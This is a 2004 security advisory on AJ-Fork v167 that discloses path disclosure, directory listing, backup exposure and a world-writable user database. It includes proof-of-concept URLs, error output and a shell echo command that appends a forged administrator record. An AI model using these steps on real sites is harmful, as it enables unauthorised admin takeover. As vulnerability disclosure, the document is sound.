ECHO_ADV_07$2004 --------------------------------------------------------------------------- Multiple Vulnerabilities in AJ-Fork --------------------------------------------------------------------------- Author: y3dips Date: September, 23th 2004 Location: Indonesia, Jakarta Web: http://echo.or.id/adv/adv07-y3dips-2004.txt --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ AJ-Fork is, as the name implies - a fork. Based on the CuteNews 1.3.1 core, the aim of the project is to improve what can be improved, and extend what can be extended without adding too much bloat (in fierce opposition to the mainstream blogging/light publishing tools of today). The project aims to be backwards-compatible with CuteNews in what areas are sensible. version : AJ-Fork v. 167 web : http://appelsinjuice.org --------------------------------------------------------------------------- Vulnerabilities: ~~~~~~~~~~~~~~~~ A. Full path disclosure: Almost all Script files in plugins/ Directories are not protected against direct access. A remote user can access the file to cause the system to display an error message that indicates the installation path. The resulting error message will disclose potentially sensitive installation path information to the remote attacker. vulnerable files are : auto-acronyms.php, auto-archive.php, count-article-views.php, kses.php, custom-quick-tags.php, disable-all-comments.php , easy-date-format.php, enable-disable-comments.php, filter-by-author.php, format-switcher.php, long-to-short.php, prospective-posting.php, sort-by-xfield.php, POC : - auto-acronyms.php files http://localhost/ajfork/plugins/auto-acronyms.php Fatal error: Call to undefined function: add_filter() in/var/www/html/ajfork /plugins/auto-acronyms.php on line 13 - auto-archive.php files http://localhost/ajfork/plugins/auto-archive.php Fatal error: Cannot instantiate non-existent class: pluginsettings in /var/www/html/ajfork/plugins/auto-archive.php on line 42 also in shows.inc.php files in inc/ directories http://localhost/ajfork/inc/shows.inc.php Warning: main(/inc/plugins.php): failed to open stream: No such file or directory in /var/www/html/ajfork/inc/shows.inc.php on line 4 Warning: main(): Failed opening '/inc/plugins.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/ajfork/inc/shows.inc.php on line 4 Fatal error: Call to undefined function: loadactiveplugins() in /var/www/html/ajfork/inc/shows.inc.php on line 5 B. Directory listing to All directory All the directory such as data ,inc ,plugins, skins, tools are not protected again direct access, a remote user that access the directories could see the list of file or script, and able to download some file. (eg .pl , .mdu ) POC : http://localhost/ajfork/inc/main.mdu C. Access to backup directory If a remote user point out the url in the browser to http://localhost/ajfork/data/backup/ , then it get an warning message : You can not view the content of this directory !!! but if u go straigt to backup directories (the backup is in directories form) POC : the name of backup is : dudul then go to : http://localhost/ajfork/data/backup/dudul after that a remote user will see the listing of files in 'dudul' directories Name Last modified Size Description Parent Directory - archives/ 23-Sep-2004 02:32 - comments.txt 23-Sep-2004 02:32 14 news.txt 23-Sep-2004 02:32 2.1K D. Access to Database file are allowed (Write, Read, Execute) Ajfork use file "users.db.php" as database file to archive user information ( surname, id, *password ) , and the worst thing is the install instruction This is the readme file, showing the instruction, which is can be reach at http://[$SITE]/ajfork/readme.htm --------------------------------readme.htm--------------------------------- Installing Installing CuteNews AJ-Fork is really quite simple, but to make it even more simple for you, this step-by-step guide has been written: 1. --- 5. Use your FTP client to CHMOD: 777 (755 might work): all files and folders in the "data/ folder" 644 (or just 777): index.php This will enable the script to read/write from/to its datafiles. 7. --- ---------------------------------- eof --------------------------------- so what is the problem ? the real problem is ? the "users.db.php" are in the data/ folder , it means that other user/nobody account can write to that file. then [attacker] could inject the file with "known" database format. POC : dudul : ajfork user / admin [1] y3dips : [ATTACKER] (user with the same host) ---------------------------------users.db.php----------------------------- 1095859199|1|dudul|c3cf519bdad87c229a203ae5a42a23f2|dudul|dudul@dudul.com|1|0||1096478833|| ---------------------------------- EOF ---------------------------------- Scenario : ^ [y3dips@ESC data]$ pwd /var/www/html/ajfork/data ^ [y3dips@ESC data]$ ls -la users.db.php -rwxrwxrwx 1 dudul dudul 433 Sep 30 00:30 users.db.php ^ [y3dips@ESC data]$ echo "1096482670|1|y3dips|fb8ce4bfe2d0cafce47202961ecc64b3|y3dips|y3dips@ganteng.com|0|0||||" >> users.db.php let see the file "users.db.php" ---------------------------------users.db.php----------------------------- 1095859199|1|dudul|c3cf519bdad87c229a203ae5a42a23f2|dudul|dudul@dudul.com|1|0||1096478833|| 1096482670|1|y3dips|fb8ce4bfe2d0cafce47202961ecc64b3|y3dips|y3dips@ganteng.com|0|0|||| ------------------------------------- EOF -------------------------------- now, just go to the site and manage the site with y3dips account (administrator) not only that , you can only read the file and grab the info to gain the encrypted password, but it is easier to insert :) *notice : The sad thing, ive change the file (users.db.php) permission to 755 , but i found error in the top of the page. Warning: fopen(./data/users.db.php): failed to open stream: Permission denied in /var/www/html/ajfork/index.php on line 146 ....... that because browser (acctually with nobody access) can't write to the file , coz the users.db.php used to updated the info also you cant do any change to user setting (add or edit user ) -------------------------------------------------------------------------- The fix: ~~~~~~~~ Vendor allready contacted but still no response --------------------------------------------------------------------------- Shoutz: ~~~~~~~ ~ m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to @T echo/staff ~ yudhax, biatch-x, lieur-euy, yadi_syahid ~ newbie_hacker@yahoogroups.com , ~ #e-c-h-o & #aikmel @DALNET --------------------------------------------------------------------------- Contact: ~~~~~~~~ y3dips || echo|staff || y3dips(at)echo(dot)or(dot)id Homepage: http://y3dips.echo.or.id/ -------------------------------- [ EOF ] ----------------------------------